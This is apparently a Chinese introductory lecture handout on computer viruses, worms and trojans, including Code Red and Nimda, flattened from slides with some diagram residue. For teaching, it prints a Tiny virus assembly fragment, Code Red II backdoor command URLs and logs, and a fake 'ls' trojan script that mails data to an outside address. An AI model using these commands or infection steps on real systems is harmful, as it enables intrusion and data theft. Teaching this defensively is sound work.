计算机病毒、蠕虫和特洛伊木马介绍(网络安全基础课讲义

《计算机病毒、蠕虫和特洛伊木马介绍(网络安全基础课讲义》由会员上传分享，免费在线阅读，更多相关内容在行业资料-天天文库。

计算机病毒、蠕虫和特洛伊木马 提纲计算机病毒网络蠕虫特洛伊木马 计算机病毒病毒结构模型病毒的分类引导型病毒文件型病毒宏病毒病毒举例病毒防范 计算机病毒的结构传染条件判断传染代码表现及破坏条件判断破坏代码传染模块表现模块 计算机病毒的分类按攻击平台分类：DOS,Win32，MAC，Unix按危害分类：良性、恶性按代码形式：源码、中间代码、目标码按宿主分类：引导型主引导区操作系统引导区文件型操作系统应用程序宏病毒 引导型病毒—引导记录主引导记录（MBR）55AA主引导程序(446字节)分区1(16字节)主分区表(64字节）分区2(16字节)分区3(16字节)分区4(16字节)结束标记（2字节）引导代码及出错信息A 引导型病毒——系统引导过程PowerOnCPU&ROMBIOSInitializesPOSTTestsLookforbootdeviceMBRbootPartitionTableLoadDOSBootSectorRunsLoadsIO.SYSMSDOS.SYSDOSLoaded 引导型病毒—感染与执行过程系统引导区引导正常执行病毒病毒执行病毒驻留带毒执行。。。。。病毒引导系统病毒体。。。 病毒的激活过程空闲区。内存空间病毒进入int8int21int2Fint4A时钟中断处理DOS中断处理外设处理中断实时时种警报中断空闲区带病毒程序空闲区空闲区正常程序病毒int8int8。int8。int8int8int8int8int8int8int8int8int8int8。int8int8空闲区正常程序正常程序。正常程序正常程序int8是26日？是,破坏！int8 ……举例—小球病毒（BouncingBall)在磁盘上的存储位置文件分配表病毒的第二部分……000号扇区001号扇区第一个空簇FF7正常的引导扇区正常的引导扇区病毒的第一部分 感染后的系统启动过程启动将病毒程序的第一部分送入内存高端将第二部分装入内存，与第一部分拼接在一起读入真正的Boot区代码，送到0000:TC00处修改INT13中断向量，指向病毒转移到0000:TC00处，开始真正的系统引导 触发条件－－修改后的INT13进入INT13中断是否为读盘？执行正常的INT13程序执行正常的INT13程序N所读盘是否是自身？Y修改INT8开始发作Y是否整点或半点Y执行正常的INT13程序Y是否带病毒？N调用传染过程感染磁盘N不发作执行正常的INT13程序N 病毒检测原理特征匹配例如，在香港病毒:1F58EA1AAF00F09C:POPAXJMPF000∶AF1APUSHF行为监控对中断向量表的修改对引导记录的修改对.exe,.com文件的写操作驻留内存软件模拟 防范与检测数据备份不要用移动介质启动（设置CMOS选项）设置CMOS的引导记录保护选项安装补丁，并及时更新安装防病毒软件，及时更新病毒定义码限制文件共享不轻易打开电子邮件的附件没有病毒处理前不要使用其他移动介质不要运行不可信的程序移动介质写保护 文件型病毒—文件结构.COM文件.EXE文件PSPHeader(256bytes)Code,Data,StackSegment(s)(64KBytes)代码、数据、堆栈在通一段中在内存中的.COM是磁盘文件的镜像PSPHeader(512bytes)CodeSegment(s)(64K)DataSegment(s)(64K)StackSegment(s)(64K) 其他可执行的文件类型.BAT.PIF.SYS.DRV.OVR.OVL.DLL.VxD 正常程序正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头正常程序程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序头程序头病毒程序程序头病毒程序程序头病毒程序程序头病毒程序程序头病毒程序程序头病毒程序病毒程序病毒程序病毒程序正常程序程序头程序头文件型病毒感染机理 文件型病毒举例最简单的病毒Tiny-32(32bytes)寻找宿主文件打开文件把自己写入文件关闭文件MOVAH,4E;setuptofindafileINT21;findthehostfileMOVAX,3D02;setuptoopenthehostfileINT21;openhostfileMOVAH,40;setuptowritefiletodiskINT21;writetofileDB*.COM;whatfilestolookfor 宏病毒（MacroVirus）历史：1980年，Dr.FredrickCohenandRalfBurger论文1994年，MicrosoftWord第一例宏病毒Word,Excel,Access,PowerPoint,Project,LotusAmiPro,Visio,Lotus1-2-3,AutoCAD,CorelDraw.使用数据文件进行传播，使得反病毒软件不再只关注可执行文件和引导区DOEViRT统计，85%的病毒感染归因于宏病毒易于编写，只需要一两天的时间，10－15行代码大量的用户：90MillionMSOfficeUsers人们通常不交换程序，而交换数据 宏病毒工作机理有毒文件.docNormal.dot激活autoopen宏写入无毒文件.docNormal.dot启动激活病毒 注意事项Macro可以存在模板里，也可以存在文档里RTF文件也可以包含宏病毒通过IE浏览器可以直接打开，而不提示下载 提纲计算机病毒网络蠕虫特洛伊木马 蠕虫（Worm）一个独立的计算机程序，不需要宿主自我复制，自主传播（Mobile）占用系统或网络资源、破坏其他程序不伪装成其他程序，靠自主传播利用系统漏洞；利用电子邮件（无需用户参与） 莫里斯蠕虫事件发生于1988年，当时导致大约6000台机器瘫痪主要的攻击方法Rsh，rexec：用户的缺省认证Sendmail的debug模式Fingerd的缓冲区溢出口令猜测 CRI主要影响WindowsNT系统和Windows2000主要影响国外网络据CERT统计，至8月初已经感染超过25万台主要行为利用IIS的Index服务的缓冲区溢出缺陷进入系统检查c: otworm文件是否存在以判断是否感染中文保护（是中文windows就不修改主页）攻击白宫！ CRIIInspiredbyRCI影响波及全球国内影响尤其广泛主要行为所利用缺陷相同只感染windows2000系统，由于一些参数的问题，只会导致NT死机休眠与扫描：中文windows，600个线程 Nimda简介影响系统：MSwin9x,wind2k,winXP传播途径：Email、文件共享、页面浏览、MSIIS目录遍历、CodeRed后门影响群发电子邮件，付病毒扫描共享文件夹，扫描有漏洞的IIS,扫描有CodeRed后门的IISServer 红色代码病毒红色代码病毒是一种结合了病毒、木马、DDOS机制的蠕虫。2001年7月中旬，在美国等地大规模蔓延。2001年8月初，出现变种coderedII，针对中文版windows系统，国内大规模蔓延。通过80端口传播。只存在与网络服务器的内存，不通过文件载体。利用IIS缓冲区溢出漏洞（2001年6月18日发布） CodeRedI CodeRedII增加了特洛依木马的功能，并针对中国网站做了改进计算IP的方法进行了修改，使病毒传染的更快；检查是否存在CodeRedII原子，若存在则进入睡眠状态防止反复感染，若不存在则创建CodeRedII原子；创建300个线程进行传染，若系统默认语言为简体中文或繁体中文，则创建600个线程；检查时间。病毒作者的意图是传播过程在2001年10月1日完成，之后，蠕虫会爆发而使系统不断重新启动。在系统中安装一个特洛依木马：拷贝系统目录cmd.exe到IIS的脚本执行目录下，改名为root.exe；将病毒体内的木马解压缩写到C盘和D盘的explorer.exe木马每次系统和启动都会运行，禁止系统的文件保护功能，并将C盘和D盘通过web服务器共享 CodeRedII攻击形式http://x.x.x.x/c/inetpub/scripts/root.exe?/c+dirhttp://x.x.x.x/c/winnt/system32/cmd.exe?/c+dir其中x.x.x.x是被攻击的IP地址，dir可以是任意命令，比如删除系统中的文件，向外发送机密数据等，这个后门后来也成为了nimda病毒的一个传播模式。下面是cert/cc上提供的被攻击服务器日志(CA-2001-11)2001-05-0612:20:1910.10.10.10-10.20.20.2080GET/scripts/../../winnt/system32/cmd.exe/c+dir200–2001-05-0612:20:1910.10.10.10-10.20.20.2080GET/scripts/../../winnt/system32/cmd.exe/c+dir+..200– 红色代码病毒的检测和防范针对安装IIS的windows系统；是否出现负载显著增加（CPU/网络）的现象；用netstat–an检查是否有许多对外的80端口连接在web日志中检查是否有/default.ida?xxx..%u0078%u0000％u00=aHTTP/1.0这样的攻击记录；查找系统中是否存在文件c:explorer.exe或d:explorer.exe以及root.exe；检查注册表文件中是否增加了C和D虚拟目录，以及文件保护功能是否被禁止。在任务管理器中检查是否存在两个explorer.exe进程。 提纲计算机病毒网络蠕虫特洛伊木马 特洛伊木马名字来源：古希腊故事通过伪装成其他程序、有意隐藏自己恶意行为的程序，通常留下一个远程控制的后门没有自我复制的功能非自主传播用户主动发送给其他人放到网站上由用户下载 最简单的木马举例ls#!/bin/sh/bin/mailmyaddress@test.com